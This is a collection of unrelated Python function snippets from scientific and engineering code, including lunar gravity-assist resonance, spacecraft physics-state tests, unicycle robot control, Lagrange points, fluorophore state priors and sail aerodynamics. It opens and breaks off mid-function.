excess velocity after LGA to enter in p:q resonance with the Moon [rad]\n\t# ---------------------------------------------------------------------------------------------------------------------\n\t# S/C velocity after LGA to enter in a p:q resonance with the Moon [km/s]\n\tv = np.sqrt( 2*cst.mu_E/d - (2*np.pi * cst.mu_E / (cst.T_M * p/q))**(2/3) )\n\n\t# Polar angle of the S/C velocity at infinity after LGA [rad]\n\ttheta_p = np.arccos( (v**2 - cst.V_M**2 - v_inf**2) / (2 * cst.V_M * v_inf) )\n\n\n\t# 2 - Computation of the admissible longitude angles of the S/C velocity at infinity after LGA to enter in p:q resonance with the Moon [rad]\n\t# ------------------------------------------------------------------------------------------------------------------------------------------\n\t# Computation of the maximum rotation [rad]\n\tdelta_max = 2 * np.arcsin( cst.mu_M/(cst.R_M+r_m) / (v_inf**2 + cst.mu_M/(cst.R_M+r_m)) )\n\n\t# Possible longitude angles [rad]\n\tphi_p_arr = np.linspace(-np.pi, np.pi, 100)\n\n\t# Admissible longitude angles [rad]\n\tphi_p_adm = np.array([])\n\n\tdef admissible_longitude(phi_p):\n\t\treturn (np.cos(phi_m)*np.sin(theta_m)*np.sin(theta_p))*np.cos(phi_p) + \\\n\t\t\t (np.sin(phi_m)*np.sin(theta_m)*np.sin(theta_p))*np.sin(phi_p) + \\\n\t\t\t\tnp.cos(theta_m)*np.cos(theta_p) - np.cos(delta_max)\n\n\tfor phi_p in phi_p_arr:\n\t\tif admissible_longitude(phi_p) >= 0:\n\t\t\tphi_p_adm = np.append(phi_p_adm, phi_p)\n\n\n\tr_fs = np.ndarray(shape=(0, 8))\n\n\tt_span = [0, p/q * cst.T_M]\n\tt_eval = np.linspace(t_span[0], t_span[-1], 10000)\n\n\tfig = plt.figure()\n\tax = fig.gca(projection='3d')\n\n\tfor k, phi_p in enumerate(phi_p_adm):\n\n\t\t# Computation of the post-LGA S/C velocity in the ECI frame\n\t\tv_HRV_p = sph2cart([v_inf, phi_p, theta_p]) + v_M_HRV\n\t\tv_ECI_p = P_ECI_HRV().dot(v_HRV_p)\n\t\tr0 = np.concatenate((r[:3], v_ECI_p))\n\n\t\tprint(\"HRV : [{}, {}, {}]\".format(v_inf, phi_p*180/np.pi, theta_p*180/np.pi))\n\t\tprint(\"Velocity : {} km/s\".format(np.linalg.norm(v_M_HRV)))\n\t\tinput()\n\n\t\tsolution = solve_ivp(fun=kepler, t_span=t_span, t_eval=t_eval, y0=r0, rtol=1e-12, atol=1e-12)\n\t\tr_f = solution.y[:, -1]\n\n\t\tr_fs = np.append(r_fs, np.concatenate(([phi_p], [theta_p], r_f)))\n\n\t\tax.plot(solution.y[0], solution.y[1], solution.y[2], '-', color='blue', linewidth=1)\n\n\tplot_env_3D(ax)\n\tplt.show()\n\n\tr_fs = r_fs.reshape(int(len(r_fs)/8), 8)\n\n\treturn r_fs, solution.t", "def spatial_database():\n return UniformVelModel()", "def test_y_vector_init(self):\n # If you change the y-vector ordering, change here too #Y_VECTOR_CHANGESITE\n\n eng_fields = np.zeros(EngineeringState.N_ENGINEERING_FIELDS)\n component_array = eng_fields[EngineeringState._COMPONENT_START_INDEX:EngineeringState._COMPONENT_END_INDEX]\n for comp_i in range(0, N_COMPONENTS):\n component_array[comp_i + N_COMPONENTS * 0] = True # connected\n component_array[comp_i + N_COMPONENTS * 1] = 1 + (0.01 * comp_i) # capacity\n component_array[comp_i + N_COMPONENTS * 2] = 222200 + comp_i # temperature\n component_array[comp_i + N_COMPONENTS * 3] = comp_i % 2 # coolant_hab_one\n component_array[comp_i + N_COMPONENTS * 4] = True # coolant_hab_two\n component_array[comp_i + N_COMPONENTS * 5] = False # coolant_ayse\n\n coolant_array = eng_fields[EngineeringState._COOLANT_START_INDEX:EngineeringState._COOLANT_END_INDEX]\n for cool_i in range(0, N_COOLANT_LOOPS):\n coolant_array[cool_i + N_COOLANT_LOOPS * 0] = 555500 + cool_i # coolant_temp\n coolant_array[cool_i + N_COOLANT_LOOPS * 1] = cool_i % 2 # primary_pump_on\n coolant_array[cool_i + N_COOLANT_LOOPS * 2] = True # secondary_pump_on\n\n rad_array = eng_fields[EngineeringState._RADIATOR_START_INDEX:EngineeringState._RADIATOR_END_INDEX]\n for rad_i in range(0, N_RADIATORS):\n rad_array[rad_i + N_RADIATORS * 0] = rad_i % 4 # attached_to_coolant_loop\n rad_array[rad_i + N_RADIATORS * 1] = rad_i % 2 # functioning\n\n y0 = np.concatenate((np.array([\n 0x111, 0x222, # x\n 0x333, 0x444, # y\n 0x555, 0x777, # vx\n 0x888, 0x999, # vy\n 0.01, 0.02, # heading\n 0.03, 0.04, # spin\n 0xEEE, 0xFFF, # fuel\n 5, 6, # throttle\n 1, -1, # only First is landed on Second\n 0, 1, # Second is broken\n common.SRB_EMPTY,\n 1 # time_acc\n ]),\n eng_fields\n ))\n\n ps = PhysicsState(y0, self.proto_state)\n self.assertTrue(np.array_equal(ps.y0(), y0.astype(ps.y0().dtype)))\n self.assertEqual(ps['First'].landed_on, 'Second')\n\n proto_state = ps.as_proto()\n proto_state.timestamp = 50\n self.assertEqual(proto_state.entities[0].x, 0x111)\n self.assertEqual(proto_state.entities[0].y, 0x333)\n self.assertEqual(proto_state.entities[1].x, 0x222)\n self.assertEqual(proto_state.entities[1].y, 0x444)\n self.assertEqual(proto_state.entities[0].vx, 0x555)\n self.assertEqual(proto_state.entities[0].vy, 0x888)\n self.assertEqual(proto_state.entities[1].vx, 0x777)\n self.assertEqual(proto_state.entities[1].vy, 0x999)\n self.assertEqual(proto_state.entities[0].heading, 0.01)\n self.assertEqual(proto_state.entities[1].heading, 0.02)\n self.assertEqual(proto_state.entities[0].spin, 0.03)\n self.assertEqual(proto_state.entities[1].spin, 0.04)\n self.assertEqual(proto_state.entities[0].fuel, 0xEEE)\n self.assertEqual(proto_state.entities[1].fuel, 0xFFF)\n self.assertEqual(proto_state.entities[0].landed_on, 'Second')\n self.assertEqual(proto_state.entities[1].landed_on, '')\n self.assertEqual(proto_state.timestamp, 50)\n self.assertTrue(proto_state.entities[1].broken)\n\n for i, component in enumerate(ps.engineering.components):\n self.assertEqual(component.connected, True, msg=i)\n self.assertEqual(component.capacity, 1 + (0.01 * i), msg=i)\n self.assertEqual(component.temperature, 222200 + i, msg=i)\n self.assertEqual(component.coolant_hab_one, bool(i % 2), msg=i)\n self.assertEqual(component.coolant_hab_two, True, msg=i)\n self.assertEqual(component.coolant_ayse, False, msg=i)\n\n for i, coolant in enumerate(ps.engineering.coolant_loops):\n self.assertEqual(coolant.coolant_temp, 555500 + i, msg=i)\n self.assertEqual(coolant.primary_pump_on, bool(i % 2), msg=i)\n self.assertEqual(coolant.secondary_pump_on, True, msg=i)\n\n for i, radiator in enumerate(ps.engineering.radiators):\n pass\n self.assertEqual(radiator.attached_to_coolant_loop, i % 4, msg=i)\n self.assertEqual(radiator.functioning, bool(i % 2), msg=i)", "def vel_inicial(x): #Velocidad inicial como un vector de ceros\r\n return np.zeros_like(x)", "def LRC(self):\n pseudo_inverse = np.linalg.pinv(self.phi)\n self.g = np.dot(pseudo_inverse, self.Y)\n self.b = self.g[-1]\n self.g = self.g[:-1]", "def compute_vel(self, state, goal):\n\n \"\"\"\n Unicycle model control law:\n [v;w] = [kp 0 0; 0 ka kb]*[p;a;b]\n v = commanded linear velocity of robot\n w = commanded rotational velcoity of robot\n kp = gain parameter where kp > 0\n ka = gain parameter where ka - kp > 0\n kb = gain parameter where kb < 0\n p = distance from robot to goal\n a = angle between current robot heading and heading to goal\n b = error between current heading to goal and target end heading\n \"\"\"\n \n #print('state,goal,v,w')\n #print(state)\n #print(goal)\n\n xr = state[0][0] # m in world frame\n yr = state[1][0] # m in world frame\n thetar = state[2][0] #rads\n\n xg = goal[0] # m in world frame\n yg = goal[1] # m in world frame\n\n dy = yg - yr\n dx = xg - xr\n\n #print('')\n #print(state)\n #print(goal)\n \n # Calculate a\n a = -1*thetar + math.atan2(dy,dx)\n\n #print(a)\n\n if a > math.pi:\n a = a - 2*math.pi\n\n if a < -1*math.pi:\n a = a + 2*math.pi\n\n #print(a)\n\n # Set omega according to control law\n omega = self.ka*a\n if math.fabs(omega) > self.MAX_OMEGA:\n if omega > 0:\n omega = self.MAX_OMEGA\n else:\n omega = -1*self.MAX_OMEGA\n\n # Calculate P\n p = math.sqrt(dy*dy + dx*dx)\n\n # Set v \n v = self.kp*p\n if v > self.MAX_SPEED:\n v = self.MAX_SPEED\n\n # set the done value\n done = (p <= self.done_distance)\n\n #print(v)\n #print(omega)\n\n out_tuple = (v, omega, done)\n \n return out_tuple", "def init():\n global balls, super_balls\n\n balls = [gen_ball() for _ in range(number_of_balls)]\n super_balls = []\n generate_velocity_all_balls()", "def _position_and_velocity(self, jd):\n pos, vel = terra(self.latitude.radians, self.longitude.radians,\n self.elevation.au, jd.gast)\n pos = einsum('ij...,j...->i...', jd.MT, pos)\n vel = einsum('ij...,j...->i...', jd.MT, vel)\n return pos, vel", "def initialize_variables(self, data, parameters) -> object:\n\n val = SimpleNamespace(**parameters)\n\n # extract parameters\n flor_brightness_guess = val.flor_brightness_guess\n gain = val.gain\n mu_flor_mean = val.mu_flor_mean\n mu_flor_shape = val.mu_flor_shape\n mu_back_mean = val.mu_back_mean\n mu_back_shape = val.mu_back_shape\n transitions_conc = val.transitions_conc\n load_weight = val.load_weight\n num_end = val.num_end\n num_load = val.num_load\n num_states = val.num_states\n num_together = val.num_together\n\n # set up numbers\n num_rois, num_data = data.shape\n # use ruler method to set initial guess for the number of fluorophores\n num_estimated = np.max(np.max(data, axis=1) - np.min(data, axis=1)) / flor_brightness_guess\n if num_end is None:\n # assume last one percent of the data is photobleached\n num_end = int(round(num_data / 100))\n if num_load is None:\n num_load = int(round(1.5 * num_estimated, -1))\n\n # set up priors\n if num_states == 2:\n bright_idx = np.array([1, 0])\n else:\n bright_idx = np.array([0, *np.ones(num_states - 2), 0])\n if mu_flor_mean is None:\n mu_flor_mean = bright_idx * flor_brightness_guess / gain\n if np.isscalar(mu_flor_shape):\n # place a sharp prior on fluorophore brightness\n mu_flor_shape = bright_idx * mu_flor_shape\n if mu_back_mean is None:\n # last data point is the estimate for background\n mu_back_mean = np.mean(data[:, -num_end:], axis=1) / gain\n if np.isscalar(mu_back_shape):\n # place a sharp prior on background\n mu_back_shape = np.ones(num_rois) * mu_back_shape\n if transitions_conc is None:\n pi = np.ones((num_states + 1, num_states))\n # fluorophores cannot start photobleached\n pi[-1, -1] = 0\n # increase self transition\n pi[:-1, :] += 100 * np.eye(num_states)\n # photobleached can only self transition\n pi[-2, :-1] = 0\n # do not allow dark to bleached transitions\n if num_states > 2:\n pi[0, -1] = 0\n # normalize the matrix\n for k in range(num_states + 1):\n pi[k, :] /= np.sum(pi[k, :])\n transitions_conc = pi\n\n # calculate joint photostate combinations\n \"\"\"\n The joint photostate combinations are needed to sample\n multiple phototrajectories simultaneously. That is,\n instead of sampling the phototrajectory of fluorophore A\n and then sampling the phototrajectory of fluorophore B,\n we sample the joint phototrajectory of fluorophore A and\n B in order to get better mixing. If, for example, each\n fluorphore can either be bright or dark, then the joint\n state space would have four components:\n 1) A bright and B bright\n 2) A bright and B dark\n 3) A dark and B bright\n 4) A dark and B dark\n Here we generalize to include multiple states per\n fluorophore and more than 2 fluorophores per joint\n state space.\n \"\"\"\n num_combos = num_states ** num_together\n state_combos = np.zeros((num_combos, num_together), dtype=int)\n for k in range(num_together):\n state_combos[:, k] = np.tile(\n np.repeat(np.arange(num_states), num_states ** (num_together - k - 1)),\n num_states ** k\n )\n # reduce number of joint photostate combinations by equating states with equal brightness\n \"\"\"\n Note that many of the states in the joint state space\n will have the same brightness. For example, A dark with\n B brigth will be the same brightness as A bright with B\n dark. Therefore, to speed up calculations, instead of \n caclulating brightness of A-bright-B-dark and A-dark-B-bright\n seperately, we can calculate the brightness of\n one-fluorophore-bright and use the value for both of the\n above joint states.\n \"\"\"\n degenerate_combos = state_combos.copy()\n for k in np.where(val.mu_flor_mean == 0)[0]:\n degenerate_combos[degenerate_combos == k] = num_states - 1\n degenerate_combos = np.sort(degenerate_combos, axis=1)\n\n # load val with calculated values\n val.num_data = num_data\n val.num_rois = num_rois\n val.num_end = num_end\n val.num_load = num_load\n val.mu_flor_mean = mu_flor_mean\n val.mu_flor_shape = mu_flor_shape\n val.mu_back_mean = mu_back_mean\n val.mu_back_shape = mu_back_shape\n val.transitions_conc = transitions_conc\n val.load_weight = load_weight\n val.num_combos = num_combos\n val.state_combos = state_combos\n val.degenerate_combos = degenerate_combos\n\n # set up variables\n states = (num_states - 1) * np.ones((num_rois, num_load, num_data), dtype=int)\n num_flor = np.zeros(num_rois)\n mu_flor = stats.norm.rvs(mu_flor_mean, .01) * (mu_flor_mean > 0)\n mu_back = stats.norm.rvs(mu_back_mean, .01)\n transitions = Dirichlet.sample(1000 * transitions_conc)\n val.states = states\n val.num_flor = num_flor\n val.mu_flor = mu_flor\n val.mu_back = mu_back\n val.transitions = transitions\n val.P = self.posterior(val)\n\n return val", "def __generate_LSP_angles__(self):\n self.LSP_ANGLES = np.linspace(0, self._range_lsp_angle, ArrayInfo.len_lsp) - (self._range_lsp_angle / 2)\n self.LSP_MIN_ANGLE = np.min(self.LSP_ANGLES) - 0.5 # Angles outside of this range are discarded\n self.LSP_MAX_ANGLE = np.max(self.LSP_ANGLES) + 0.5 # Angles outside of this range are discarded", "def laplace_value(self, s, dimensional: bool = True, eps_zz: np.ndarray = None):\n I0, I1, J0, J1, ln, exp, sqrt = self.get_core_equations()\n t0_tg, tg, strain_rate, E1, E3, v21, v31 = self.get_predefined_constants()\n\n delta1, delta2, delta3, C11, C12, C13, C33, C0, C1, C2 = self.get_calculable_constants()\n\n if eps_zz is None:\n if t0_tg is None: # Stepwise strain (not ramped)\n # Recall e^x ≈ 1+x for small x\n # lim as t0->0 of (1 - exp(-t0_tg * s)) / (s*s)\n # = (1- (1-t0_tg*s) )/(s*s)\n # = ( t0_tg*s )/(s*s) = t0_tg/s\n eps_zz = strain_rate * tg * 1/s\n else:\n eps_zz = strain_rate * tg * (1 - exp(-t0_tg * s)) / (s*s)\n\n #I1rts = I1(sqrt(s))\n I1rts_s = I1(sqrt(s)) / sqrt(s)\n I0rts = I0(sqrt(s))\n\n # F is the load intensity\n F = (C1*I0rts - C2*C0*I1rts_s) / (I0rts - C0*I1rts_s) * eps_zz\n\n if dimensional:\n F = F * (C11-C12)/2\n\n return F", "def init_dyn(self, arr_x, arr_y, range_x, range_y, d_x, d_y, a, b, c, n_p, temp, m):\n # call potential function\n gp = GeneratePotential(arr_x, arr_y, range_x, range_y, d_x, d_y, a, b, c)\n # get potential, force and numbers of grid\n pot, fx, fy, n_x, n_y = gp.gen_pot()\n # assign initial positions\n pos_x, pos_y = self.assgin_pos(range_x, range_y, n_p)\n # assign initial velocities\n vel_x, vel_y = self.assign_vel(n_p, temp, m)\n # get slopes for interpolation\n k_pot, k_fx, k_fy = self.grid_interp(pot, fx, fy, n_x, n_y, d_y)\n return pot, fx, fy, n_x, n_y, pos_x, pos_y, vel_x, vel_y, k_pot, k_fx, k_fy", "def _set_leg_params(self):\n self.p = 0.01600\n self.q = 0.00000\n self.r = 0.02000\n self.c = 0.01811\n self.u = 0.00000\n self.v = 0.00000\n self.e = -0.06000\n self.h = -0.02820\n self.s = 0.02200\n self.d1 = 0.0\n self.d2 = 0.0\n self.d3 = 0.0\n self.stability = 0.0", "def initialize_position(self):\n self.x = (self.cell_xl**3 +\n (self.cell_xr**3 - self.cell_xl**3) *\n np.random.rand(1)[0])**(1./3.)", "def generate_initial_positions(ntemps, nwalkers, ref_time, fit_qm=False,\n prior_params=prior_params_default, rseed=None):\n \n if rseed is not None:\n np.random.seed(rseed)\n \n par_list = []\n \n # Omega\n par_list.append(st.uniform.rvs(loc=0, scale=180,\n size=(nwalkers, ntemps)))\n\n # omega\n par_list.append(st.uniform.rvs(loc=-180, scale=360,\n size=(nwalkers, ntemps)))\n \n # i\n par_list.append(st.uniform.rvs(loc=0, scale=90,\n size=(nwalkers, ntemps)))\n \n # a\n par_list.append(st.halfnorm.rvs(size=(nwalkers, ntemps),\n **prior_params['a_axis']))\n \n # ecc\n par_list.append(st.uniform.rvs(loc=0, scale=1, size=(nwalkers, ntemps)))\n \n # period, T0\n period = st.uniform.rvs(size=(nwalkers, ntemps), **prior_params['period'])\n T0 = np.array([st.uniform.rvs(loc=ref_time, scale=p, size=1)\n for p in period.flatten()]).reshape((nwalkers, ntemps))\n par_list.append(period)\n par_list.append(T0)\n\n # mu_delta\n par_list.append(st.norm.rvs(size=(nwalkers, ntemps),\n **prior_params['mu_delta']))\n \n # mu_alpha\n par_list.append(st.norm.rvs(size=(nwalkers, ntemps),\n **prior_params['mu_alpha']))\n \n # pi_parallax\n par_list.append(st.halfnorm.rvs(size=(nwalkers, ntemps),\n **prior_params['pi_p']))\n \n # Ddelta_ref\n par_list.append(st.norm.rvs(size=(nwalkers, ntemps),\n **prior_params['Ddelta_ref']))\n \n # Dalpha_ref\n par_list.append(st.norm.rvs(size=(nwalkers, ntemps),\n **prior_params['Dalpha_ref']))\n \n # q_m\n if fit_qm:\n par_list.append(st.halfnorm.rvs(size=(nwalkers, ntemps),\n **prior_params['q_m']))\n \n \n p0 = np.array(par_list).T\n \n return p0", "def getVelocity(grid=None, ppar=None):\n\n vel = np.zeros([grid.nx, grid.ny, grid.nz, 3], dtype=np.float64)\n return vel", "def _define_SLACS_fit_params(self):\n\t\t# Fit params from R_eff\n\t\tself.a = -0.41\n\t\tself.b = 0.39\n\t\t#self.delta_a = 0.12\n\t\t#self.delta_b = 0.10\n\t\tself.intrinsic_scatter = 0.14\n\t\t# Fit params from vel_disp\n\t\tself.a_v = 0.07\n\t\tself.b_v = -0.12\n\t\tself.int_v = 0.17", "def calculate_theta_vals(self) -> None:\n A = np.zeros(self.num_points) # Inappropriate names, but they mirror Knuth's notation.\n B = np.zeros(self.num_points)\n C = np.zeros(self.num_points)\n D = np.zeros(self.num_points)\n R = np.zeros(self.num_points)\n\n # Calculate the entries of the five vectors.\n # Skip first and last point if path is non-cyclic.\n point_ind = range(self.num_points) if self.is_cyclic else range(1, self.num_points - 1)\n for i in point_ind:\n z_h = self.points[i - 1]\n z_i = self.points[i]\n z_j = self.points[(i + 1) % self.num_points]\n\n A[i] = z_h.alpha / (z_i.beta ** 2 * z_h.d_val)\n B[i] = (3 - z_h.alpha) / (z_i.beta ** 2 * z_h.d_val)\n C[i] = (3 - z_j.beta) / (z_i.alpha ** 2 * z_i.d_val)\n D[i] = z_j.beta / (z_i.alpha ** 2 * z_i.d_val)\n R[i] = -B[i] * z_i.psi - D[i] * z_j.psi\n\n # Set up matrix M such that the soln. Mx = R are the theta values.\n M = np.zeros((self.num_points, self.num_points))\n for i in range(self.num_points):\n # Fill i-th row of M\n M[i][i - 1] = A[i]\n M[i][i] = B[i] + C[i]\n M[i][(i + 1) % self.num_points] = D[i]\n\n # Special formulas for first and last rows of M with non-cyclic paths.\n if not self.is_cyclic:\n # First row of M\n alpha_0 = self.points[0].alpha\n beta_1 = self.points[1].beta\n xi_0 = (alpha_0 ** 2 * self.begin_curl) / beta_1 ** 2\n M[0][0] = alpha_0 * xi_0 + 3 - beta_1\n M[0][1] = (3 - alpha_0) * xi_0 + beta_1\n R[0] = -((3 - alpha_0) * xi_0 + beta_1) * self.points[1].psi\n # Last row of M\n alpha_n_1 = self.points[-2].alpha\n beta_n = self.points[-1].beta\n xi_n = (beta_n ** 2 * self.end_curl) / alpha_n_1 ** 2\n M[-1][-2] = (3 - beta_n) * xi_n + alpha_n_1\n M[-1][-1] = (beta_n * xi_n + 3 - alpha_n_1)\n R[-1] = 0\n\n # Solve for theta values.\n thetas = np.linalg.solve(M, R)\n for i, point in enumerate(self.points):\n point.theta = thetas[i]", "def initialize(self):\r\n N = self.N\r\n self.mean = array(self.x0, copy=True)\r\n self.sigma = self.sigma0\r\n self.sigmai = np.ones(N)\r\n self.ps = np.zeros(N) # path for individual and globalstep-size(s)\r\n self.r = np.zeros(N)\r\n self.pr = 0 # cumulation for zr = N(0,1)\r\n self.sigma_r = 0", "def _get_coeffs(self):\n # lift (Clmax) and parasitic drag (Cd0max)\n self.cl = 0.0\n self.cd = 0.0\n kpp = 0.0\n\n for sail in self.sails:\n\n self.cl += sail.cl(self.awa) * sail.area * sail.bk\n self.cd += sail.cd(self.awa) * sail.area * sail.bk\n kpp += sail.cl(self.awa) ** 2 * sail.area * sail.bk * sail.kp\n\n self.cl /= self.area\n self.cd /= self.area\n\n # viscous quadratic parasitic drag and induced drag\n devisor_1 = self.area * self.cl ** 2\n devisor_2 = np.pi * self._heff(self.awa) ** 2\n self.CE = (kpp / devisor_1 if devisor_1 else 0.0) + (self.area / devisor_2 if devisor_2 else 0.0)\n\n # fraction of parasitic drag due to jib\n self.fcdj = 0.0\n for sail in self.sails:\n if sail.type == \"jib\":\n self.fcdj = (\n sail.bk * sail.cd(self.awa) * sail.area / (self.cd * self.area)\n )\n\n # final lift and drag\n self.cd = self.cd * (\n self.flat * self.fcdmult(self.flat) * self.fcdj + (1 - self.fcdj)\n ) + self.CE * self.cl ** 2 * self.flat ** 2 * self.fcdmult(self.flat)\n self.cl = self.flat * self.cl", "def __init__(self):\n self.center = Point()\n self.velocity = Velocity()", "def project_gravity_core(xyz):\n ver = []\n hor = []\n \n # mean for each axis\n G = [np.mean(xyz[:, 0]), np.mean(xyz[:, 1]), np.mean(xyz[:, 2])]\n G_norm = G/np.sqrt(sum(np.power(G, 2)) + 0.0000001)\n \n # The projection is here\n for i in range(len(xyz[:, 0])):\n ver.append(float(np.dot([xyz[i, :]], G)))\n hor.append(float(np.sqrt(np.dot(xyz[i, :]-ver[i]*G_norm, xyz[i, :]-ver[i]*G_norm))))\n \n ver = np.reshape(np.asarray(ver), len(ver))\n return Vectors.dense(ver), Vectors.dense(hor)", "def coef_val():\n\n basepath = path.join(path.dirname(path.realpath('__file__')), 'data')\n fdata = basepath + path.sep + 'VAWTPolySurfaceCoef_pub.csv' # published coefficients from paper\n # fdata = basepath + path.sep + 'VAWTPolySurfaceCoef.csv' # polynomial surface fitting coefficients\n\n loc1 = np.zeros(10)\n loc2 = np.zeros(10)\n loc3 = np.zeros(10)\n spr1 = np.zeros(10)\n spr2 = np.zeros(10)\n skw1 = np.zeros(10)\n skw2 = np.zeros(10)\n scl1 = np.zeros(10)\n scl2 = np.zeros(10)\n scl3 = np.zeros(10)\n\n f = open(fdata)\n csv_f = csv.reader(f)\n\n i = 0\n for row in csv_f:\n if i != 0:\n loc1[i-1] = float(row[0])\n loc2[i-1] = float(row[1])\n loc3[i-1] = float(row[2])\n spr1[i-1] = float(row[3])\n spr2[i-1] = float(row[4])\n skw1[i-1] = float(row[5])\n skw2[i-1] = float(row[6])\n scl1[i-1] = float(row[7])\n scl2[i-1] = float(row[8])\n scl3[i-1] = float(row[9])\n i += 1\n\n f.close()\n\n return loc1,loc2,loc3,spr1,spr2,skw1,skw2,scl1,scl2,scl3", "def init(self):\n\n self.pos = np.random.rand(self.N, 7)\n for i in range(3):\n self.pos[:, i] *= (self.bounds[2*i+1] - self.bounds[2*i])\n self.pos[:, i] += self.bounds[2*i]\n\n # Star colors http://www.isthe.com/chongo/tech/astro/HR-temp-mass-table-byhrclass.html http://www.vendian.org/mncharity/dir3/starcolor/\n O3 = np.array([144., 166., 255.])\n O3 /= 255.\n self.pos[:, 3:-1] = O3[None, :]\n M4Ia = np.array([255., 185., 104.])\n M4Ia /= 255.\n self.pos[np.random.rand(self.N)>.5, 3:-1] = M4Ia[None, :]\n\n self.pos[:, -1] = .8 + .2*self.pos[:, -1]", "def lagrangePoints(mu):\n \n # define l = 1-mu\n l = 1 - mu\n \n # collinear points\n def eqL1(x):\n fval = x**5 + 2*(mu-l)*x**4 + (l**2-4*l*mu+mu**2)*x**3 + (2*mu*l*(l-mu)+mu-l)*x**2 + (mu**2*l**2+2*(l**2+mu**2))*x + mu**3-l**3\n #fval = gamma**5 - (3-mu)*gamma**4 + (3-2*mu)*gamma**3 - mu*gamma**2 + 2*mu*gamma - mu\n return fval\n sol_l1 = optimize.root(eqL1, 0.5, method='hybr')\n l1 = np.array([sol_l1.x[0] , 0, 0])\n \n def eqL2(x):\n fval = x**5 + 2*(mu-l)*x**4 + (l**2-4*l*mu+mu**2)*x**3 + (2*mu*l*(l-mu)-(mu+l))*x**2 + (mu**2*l**2+2*(l**2-mu**2))*x - (mu**3+l**3)\n #fval = gamma**5 + (3-mu)*gamma**4 + (3-2*mu)*gamma**3 - mu*gamma**2 - 2*mu*gamma - mu\n return fval\n sol_l2 = optimize.root(eqL2, 1.5, method='hybr')\n l2 = np.array([sol_l2.x[0] , 0, 0])\n \n def eqL3(x):\n fval = x**5 + 2*(mu-l)*x**4 + (l**2-4*mu*l+mu**2)*x**3 + (2*mu*l*(l-mu)+(l+mu))*x**2 + (mu**2*l**2+2*(mu**2-l**2))*x + l**3+mu**3\n return fval\n sol_l3 = optimize.root(eqL3, -1, method='hybr')\n l3 = np.array([sol_l3.x[0] , 0, 0])\n \n # equilateral points\n # L4\n l4 = np.array([np.cos(np.pi/3) - mu , np.sin(np.pi/3), 0])\n # L5\n l5 = np.array([np.cos(np.pi/3) - mu , -np.sin(np.pi/3), 0])\n \n return _lagrangePointsReturn(l1,l2,l3,l4,l5)", "def approximate_nonlinear_vector_field(dataset_path):\n\n file_X0 = \"nonlinear_vectorfield_data_x0.txt\"\n names_X0 = ['X0_x', 'X0_y']\n data_X0 = pd.read_csv(dataset_path / file_X0, sep=' ', names=names_X0).to_numpy()\n plt.scatter(data_X0[:, 0], data_X0[:, 1])\n\n names_X1 = ['X1_x', 'X1_y']\n file_X1 = \"nonlinear_vectorfield_data_x1.txt\"\n data_X1 = pd.read_csv(dataset_path / file_X1, sep=' ', names=names_X1).to_numpy()\n plt.scatter(data_X1[:, 0], data_X1[:, 1])\n plt.title(\"Given data set X0 and X1\")\n plt.show()\n\n \"\"\"\n Following block calculates the approximate values using differential\n solver solve_ivp\n \"\"\"\n V = (data_X1 - data_X0) / 0.1\n approx_func_At = np.linalg.inv(data_X0.T @ data_X0) @ data_X0.T @ V\n approx_values = []\n for i in range(data_X0.shape[0]):\n sol = solve_ivp(fun=derivative_func, t_span=[0, 10], t_eval=[0.1],\n y0=data_X0[i, :], args=(approx_func_At,))\n approx_values.append(sol.y)\n approx_values = np.array(approx_values)\n approx_values = approx_values.reshape((2000, 2))\n\n \"\"\"\n We now plot the original data of X1 and the newly approximated data.\n \"\"\"\n plt.scatter(data_X1[:, 0], data_X1[:, 1])\n plt.scatter(approx_values[:, 0], approx_values[:, 1], c='green')\n plt.title(\"Given X1 and approximated values\")\n plt.title(\"Approximated vector field\")\n plt.show()\n\n \"\"\"\n We now plot the vector filed and the phase portrait.\n \"\"\"\n x, y = np.meshgrid(np.linspace(-5, 5, 10), np.linspace(-5, 5, 10))\n u, v = np.zeros((10, 10)), np.zeros((10, 10))\n for i in range(0, 10):\n for j in range(0, 10):\n u[i, j] = approx_values.T[0, i]\n v[i, j] = approx_values.T[1, j]\n plt.quiver(x, y, u, v)\n plt.streamplot(x, y, u, v)\n plt.title(\"Approximated Vector field\")\n plt.show()\n\n \"\"\"\n Following block calculates the mean squared error of the X1 and calculate\n approximated values.\n \"\"\"\n MSE = np.square(data_X1 - approx_values).mean()\n print(MSE)", "def _initialize_default_start(self, state):\n state.tau = self.rng.gamma(0.5, 1 / self.fixed.tau_rate)\n eta = self.rng.standard_normal(self.fixed.n)\n eta = eta - eta.mean()\n state.eta = eta\n state.spatial = self.state.eta\n state.alpha = self.rng.multivariate_normal(\n self.fixed.a_mu, 100 * self.fixed.a_prec, method='cholesky'\n )\n state.beta = self.rng.multivariate_normal(\n self.fixed.b_mu, 100 * self.fixed.b_prec, method='cholesky'\n )\n return state", "def create_vectors(self):\n self.localStatistics = []\n self.lastStatistics = []\n self.globalV = []\n self.estimate = []\n self.delta = []\n self.drift = []\n self.slack = [] # only for coordBased model", "def _mclachlan_atela_4th(vel_update, pos_update=update.PositionUpdate()):\n As = [\n 0.5153528374311229364,\n -0.085782019412973646,\n 0.4415830236164665242,\n 0.1288461583643841854,\n ]\n Bs = [\n 0.1344961992774310892,\n -0.2248198030794208058,\n 0.7563200005156682911,\n 0.3340036032863214255,\n ]\n updates = [vel_update, pos_update]*4\n coeff = []\n for a, b in zip(As, Bs):\n coeff.extend([a, b])\n return ExplicitIntegrator(coeff, updates)", "def solve(self,init=None,g_init=1e-3,g_step=5e-3,g_fin=None,evol=False,movingGrid=False):\n if(g_fin==None): g_fin=self.g\n #Check if all signs are correct\n if(g_fin<0):\n if(g_step>0): g_step*=-1.\n if(g_init>0): g_init*=-1.\n else:\n if(g_step<0): g_step*=-1.\n if(g_init<0): g_step*=-1.\n\n #If no initial distribution is given, start from the BCS ground state\n if(init==None): init=[1 if i<self.N else 0 for i in range(self.n)]\n var_init=np.array([-2.*init[i]-g_init/(1-2.*init[i])*np.sum([self.XXZ.Z(j,i)*(init[j]-init[i]) for j in range(self.n) if j!=i]) for i in range(self.n)])\n n_step=int((g_fin-g_init)/g_step)\n g=g_init\n\n #Define necessary variables if evol or movingGrid=True\n if(evol or movingGrid):\n var_evol=np.zeros([n_step,self.n])\n g_evol=np.zeros(n_step)\n if(movingGrid):\n rap_evol = np.zeros([n_step,self.N],dtype=complex)\n rap_evol[0] = [self.levels[i] for i in range(self.n) if init[i]!=0 ]\n rap=np.array([self.levels[i]+0.5*np.abs(np.random.rand()) for i in range(self.n) if init[i]!=0])\n grid=np.zeros(self.N+1,dtype=complex)\n grid[0]=1e3\n for k in range(self.N): grid[k+1]=rap[k]\n n_grid=n_step/20 #Calculates rapidities at 20 intermediate 